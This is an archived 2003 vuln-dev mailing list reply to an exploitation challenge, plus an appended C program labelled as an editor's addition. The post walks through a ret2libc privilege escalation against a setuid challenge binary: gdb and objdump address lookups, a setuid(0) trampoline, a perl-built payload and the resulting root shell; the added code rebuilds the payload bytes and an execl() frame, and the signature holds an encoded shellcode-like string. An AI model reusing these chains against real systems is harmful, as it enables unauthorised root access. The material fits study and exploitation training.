
Re: [Vuln-dev Challenge] Challenge #2

From: Jose Ronnick <matrix(at)phiral.com>
Date: Sat May 24 2003 - 21:03:03 EDT

On Sat, 24 May 2003 13:11:13 +0200
spacewalker <spacewalker@0xbadc0de.be> wrote:

> 0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in

I agree about using ret2libc... this one was easy enough that you shouldn't have used shellcode.. =) However... you forget that system() executes through /bin/sh, which will drop privs. Try making the vuln program suid root and then run your exploit... still no root shell. =/ Close.. but it really doesn't give you much more, since you already had a basic user shell before you executed the sploit..

Here's one way to do it using ret2libc to avoid the privilege dropping.. (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways).. There's also a way to do it without building a trampoline prog to bounce off of.. just chaining libc calls... If no one else posts a solution doing it, I'll do it and post it later...

matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c
matrix@overdose vuln-dev $ sudo chown root.root vuln2
matrix@overdose vuln-dev $ sudo chmod +s vuln2
matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.*
(gdb) break main
Breakpoint 1 at 0x804836e
(gdb) run
Starting program: /home/matrix/research/vuln-dev/e.x

Breakpoint 1, 0x0804836e in main ()
(gdb) p sleep
$1 = {<text variable, no debug info>} 0x400ce760 <sleep>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x400cecc0 <execl>
(gdb) quit
The program is running. Exit anyway? (y or n) y
matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit
0804974c R_386_JUMP_SLOT   exit
matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c;
matrix@overdose vuln-dev $ pwd
/home/matrix/research/vuln-dev
matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log
matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'`
h `ç
  @/home/matrix/research/vuln-dev/t.ramp
root@overdose vuln-dev # id
uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage)
root@overdose vuln-dev #

-- 
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

  • application/pgp-signature attachment: stored
Received on Sat May 24 23:40:34 2003
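Editor's added example (not Jose's code, not part of the original post): the post's point is that returning into system() loses the suid bit because /bin/sh drops privileges when euid != uid, so the chain returns into execl() and runs a trampoline that calls setuid(0) first. The block below lays out the 32-bit x86 ret2libc frame for such an execl() call and reproduces the exact bytes the post's perl one-liner emits. The three addresses are the ones the post reads out of gdb and objdump on its own box and are placeholders anywhere else; the post does not show what vuln2 does with db.log or why its filler word is the GOT slot of exit(), so build_post_payload() only reproduces the layout. The argv_safe() check covers the caveat a practitioner hits first: a payload delivered on the command line cannot carry the 0x00 word that terminates execl's argument list, because argv strings are NUL-terminated.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not the original post's exploit: lays out a 32-bit x86
 * ret2libc frame that returns into execl() rather than system().
 *
 * After the overwritten saved EIP the stack must look like a call that has
 * just been made to execl, i.e. the word execl will pop as its return
 * address followed by its arguments:
 *
 *     [ &execl ] [ fake_ret ] [ &path ] [ &argv0 ] [ NULL terminator ]
 *
 * The three addresses below are the ones the post reads out of gdb and
 * objdump on its own box; they are assumptions for any other target.
 */
#define EXECL_ADDR  0x400cecc0u   /* gdb: p execl (post's libc)              */
#define EXIT_GOT    0x0804974cu   /* objdump -R vuln2: R_386_JUMP_SLOT exit  */
#define AFTER_GOT   0x08049750u   /* the word the post places after &execl   */

/* Serialise 32-bit words little-endian (x86 byte order). Returns bytes
 * written, or 0 if the buffer is too small. */
size_t pack_words_le(uint8_t *out, size_t cap, const uint32_t *words, size_t n)
{
    if (n * 4 > cap)
        return 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t v = words[i];
        out[4 * i + 0] = (uint8_t)(v & 0xff);
        out[4 * i + 1] = (uint8_t)((v >> 8) & 0xff);
        out[4 * i + 2] = (uint8_t)((v >> 16) & 0xff);
        out[4 * i + 3] = (uint8_t)((v >> 24) & 0xff);
    }
    return n * 4;
}

/* Generic execl(path, argv0, NULL) frame: pad_words copies of pad_word to
 * reach the saved EIP, then &execl, the address execl "returns" to, and its
 * arguments. path_addr must point at the trampoline's path somewhere in the
 * victim's memory (the post parks the path in a file the program reads). */
size_t build_execl_frame(uint8_t *out, size_t cap, size_t pad_words, uint32_t pad_word,
                         uint32_t execl_addr, uint32_t fake_ret,
                         uint32_t path_addr, uint32_t argv0_addr)
{
    uint32_t words[64];
    size_t n = 0;
    if (pad_words + 5 > sizeof words / sizeof words[0])
        return 0;
    for (size_t i = 0; i < pad_words; i++)
        words[n++] = pad_word;
    words[n++] = execl_addr;
    words[n++] = fake_ret;
    words[n++] = path_addr;
    words[n++] = argv0_addr;
    words[n++] = 0;              /* execl's variadic argument list terminator */
    return pack_words_le(out, cap, words, n);
}

/* Exactly the bytes the post's perl one-liner emits:
 *   "\x4c\x97\x04\x08" x 31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08" x 3
 * The three trailing words sit where fake_ret, &path and &argv0 go; why the
 * filler is exit's GOT slot and what vuln2 does with db.log is not shown in
 * the post, so this only reproduces the layout. */
size_t build_post_payload(uint8_t *out, size_t cap)
{
    uint32_t words[35];
    size_t n = 0;
    while (n < 31)
        words[n++] = EXIT_GOT;
    words[n++] = EXECL_ADDR;
    while (n < 35)
        words[n++] = AFTER_GOT;
    return pack_words_le(out, cap, words, n);
}

/* argv strings are NUL-terminated, so a payload handed over on the command
 * line (as the post does) must not contain 0x00: a literal NULL terminator
 * word truncates it. Returns 1 if the buffer can travel via argv. */
int argv_safe(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return 0;
    return 1;
}

int main(void)
{
    uint8_t buf[256];
    size_t n = build_post_payload(buf, sizeof buf);
    printf("post payload: %zu bytes, argv-safe=%d\n", n, argv_safe(buf, n));
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", buf[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");

    /* The textbook frame with its NULL word cannot be passed via argv. */
    n = build_execl_frame(buf, sizeof buf, 31, EXIT_GOT, EXECL_ADDR,
                          EXIT_GOT, AFTER_GOT, AFTER_GOT);
    printf("frame with NULL terminator: %zu bytes, argv-safe=%d\n", n, argv_safe(buf, n));
    return 0;
}
```

Note that the post's own payload contains no zero byte at all, which is why it survives the command line; a chain that needs the NULL word has to find it already in memory or get it written by the program itself.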

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

